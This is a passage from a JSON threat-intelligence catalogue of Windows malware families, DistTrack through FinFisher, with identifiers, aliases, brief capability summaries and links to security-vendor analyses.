"http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" ], "synonyms": [], "type": [] }, "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", "value": "DistTrack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker", "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/", "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/", "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/" ], "synonyms": [], "type": [] }, "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed", "value": "DMA Locker" }, { "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. 
This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html", "https://blog.talosintelligence.com/2017/03/dnsmessenger.html" ], "synonyms": [], "type": [] }, "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", "value": "DNSMessenger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage", "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" ], "synonyms": [], "type": [] }, "uuid": "ef46bd90-91d0-4208-b3f7-08b65acb8438", "value": "DNSpionage" }, { "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower", "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" ], "synonyms": [ "Shelma" ], "type": [] }, "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", "value": "DogHousePower" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", "https://research.checkpoint.com/dorkbot-an-investigation/", "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html" ], "synonyms": [], "type": [] }, "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", "value": "NgrBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", 
"https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] }, "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", "value": "Dorshel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" ], "synonyms": [], "type": [] }, "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", "value": "DoublePulsar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" ], "synonyms": [ "DELPHACY" ], "type": [] }, "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", "value": "Downdelph" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" ], "synonyms": [], "type": [] }, "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", "value": "Downeks" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", "http://www.clearskysec.com/charmingkitten/" ], "synonyms": [], "type": [] }, "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", "value": "DownPaper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" ], "synonyms": [], "type": [] }, "uuid": 
"627a044b-1c84-409c-9f58-95b46d5d51ba", "value": "DramNudge" }, { "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", "https://lokalhost.pl/gozi_tree.txt", "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" ], "synonyms": [], "type": [] }, "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", "value": "DreamBot" }, { "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. 
It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", "https://viql.github.io/dridex/", "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" ], "synonyms": [], "type": [] }, "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", "value": "Dridex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/" ], "synonyms": [], "type": [] }, "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", "value": "DROPSHOT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" ], "synonyms": [], "type": [] }, "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", "value": "DtBackdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy", 
"https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" ], "synonyms": [], "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", "value": "DualToy (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/", "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/" ], "synonyms": [], "type": [] }, "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf", "value": "DarkHotel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute", "https://github.com/ch0sys/DUBrute" ], "synonyms": [], "type": [] }, "uuid": "2236a08f-dfbd-4f92-9d73-a895c34766ad", "value": "DUBrute" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador" ], "synonyms": [], "type": [] }, "uuid": "ea59906d-b5e1-4749-8494-9ad9a09510b5", "value": "Dumador" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" ], "synonyms": [], "type": [] }, "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", "value": "DuQu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" ], "synonyms": [], "type": [] }, "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", "value": "Duuzer" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates" ], "synonyms": [ "Dyreza" ], "type": [] }, "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", "value": "Dyre" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", "https://twitter.com/JaromirHorejsi/status/815861135882780673" ], "synonyms": [], "type": [] }, "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", "value": "EDA2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel", "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" ], "synonyms": [], "type": [] }, "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", "value": "EHDevel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" ], "synonyms": [], "type": [] }, "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", "value": "Elirks" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", "https://www.joesecurity.org/blog/8409877569366580427" ], "synonyms": [], "type": [] }, "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", 
"value": "Elise" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html", "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", "value": "Emdivi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", "https://twitter.com/thor_scanner/status/992036762515050496" ], "synonyms": [], "type": [] }, "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", "value": "Empire Downloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" ], "synonyms": [ "Lurid" ], "type": [] }, "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", "value": "Enfal" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug", "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html" ], "synonyms": [], "type": [] }, "uuid": "c4490972-3403-4043-9d61-899c0a440940", "value": "EquationDrug" }, { "description": "Rough collection EQGRP samples, to be 
sorted", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup", "https://laanwj.github.io/2016/08/28/feintcloud.html", "https://laanwj.github.io/2016/09/17/seconddate-cnc.html", "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html", "https://laanwj.github.io/2016/08/22/blatsting.html", "https://laanwj.github.io/2016/09/11/buzzdirection.html", "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", "https://laanwj.github.io/2016/09/13/blatsting-rsa.html", "https://laanwj.github.io/2016/09/01/tadaqueos.html", "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html" ], "synonyms": [], "type": [] }, "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", "value": "Equationgroup (Sorting)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus", "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" ], "synonyms": [], "type": [] }, "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", "value": "Erebus (Windows)" }, { "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. 
Supports any formats, configurable via telegram-bot", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel", "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" ], "synonyms": [], "type": [] }, "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab", "value": "Eredel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", "https://securelist.com/from-blackenergy-to-expetr/78937/", "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html", "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", "https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/", "http://www.intezer.com/notpetya-returns-bad-rabbit/", "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", "https://www.riskiq.com/blog/labs/badrabbit/", "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/", 
"https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", "https://securelist.com/schroedingers-petya/78870/", "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/", "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", 
"https://securelist.com/bad-rabbit-ransomware/82851/" ], "synonyms": [ "BadRabbit", "Diskcoder.C", "ExPetr", "NonPetya", "NotPetya", "Nyetya", "Petna", "Pnyetya", "nPetya" ], "type": [] }, "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", "value": "EternalPetya" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html", "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise" ], "synonyms": [ "HighTide" ], "type": [] }, "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", "value": "EtumBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", "https://www.cyphort.com/evilbunny-malware-instrumented-lua/", "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope" ], "synonyms": [], "type": [] }, "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", "value": "Evilbunny" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" ], "synonyms": [ "Vidgrab" ], "type": [] }, "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", "value": "EvilGrab" }, { "description": "Privately modded version of the Pony stealer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony", "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/", "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/" ], "synonyms": [ 
"CREstealer" ], "type": [] }, "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", "value": "EvilPony" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial", "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" ], "synonyms": [], "type": [] }, "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", "value": "Evrial" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" ], "synonyms": [ "Saber", "Sabresac" ], "type": [] }, "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98", "value": "Excalibur" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", "https://github.com/nccgroup/Royal_APT", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/" ], "synonyms": [], "type": [] }, "uuid": "74f8db32-799c-41e5-9815-6272908ede57", "value": "MS Exchange Tool" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat", "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html" ], "synonyms": [ "ExtRat" ], "type": [] }, "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38", "value": "Xtreme RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", "http://blog.talosintel.com/2017/01/Eye-Pyramid.html", "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/" ], "synonyms": [], 
"type": [] }, "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", "value": "Eye Pyramid" }, { "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga", "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", "https://github.com/360netlab/DGA/issues/36", "http://www.freebuf.com/column/153424.html" ], "synonyms": [ "WillExec" ], "type": [] }, "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789", "value": "FakeDGA" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" ], "synonyms": [ "Braviax" ], "type": [] }, "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", "value": "FakeRean" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" ], "synonyms": [], "type": [] }, "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", "value": "FakeTC" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" ], "synonyms": [], "type": [] }, "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", "value": "Fanny" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt", "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" ], "synonyms": [], "type": [] }, "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", "value": "FantomCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf", "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf" ], "synonyms": [], "type": [] }, "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", "value": "FastPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus", "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" ], "synonyms": [], "type": [] }, "uuid": "07a41ea7-17b2-4852-bfd7-54211c477dc0", "value": "Felismus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot", "https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257", "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", "https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html" ], "synonyms": [], "type": [] }, "uuid": "e58755ac-3d0c-4ed3-afeb-e929816c8018", "value": "Felixroot" }, { "description": "Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo", 
"http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html", "https://feodotracker.abuse.ch/", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html" ], "synonyms": [ "Bugat", "Cridex" ], "type": [] }, "uuid": "66781866-f064-467d-925d-5e5f290352f0", "value": "Feodo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ff_rat", "https://www.cylance.com/en_us/blog/breaking-down-ff-rat-malware.html" ], "synonyms": [], "type": [] }, "uuid": "e701b875-8ade-434f-89ff-6c367099bfd8", "value": "FF RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom", "https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/" ], "synonyms": [], "type": [] }, "uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933", "value": "FileIce" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy", "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/" ], "synonyms": [], "type": [] }, "uuid": "87467366-679d-425c-8bea-b9f77c543252", "value": "Final1stSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos", "https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/", "https://blogs.cisco.com/security/talos/poseidon" ], "synonyms": [ "Poseidon" ], "type": [] }, "uuid": "ae914b9a-67a2-425d-bef0-3a9624a207ba", "value": "FindPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher", "https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/", 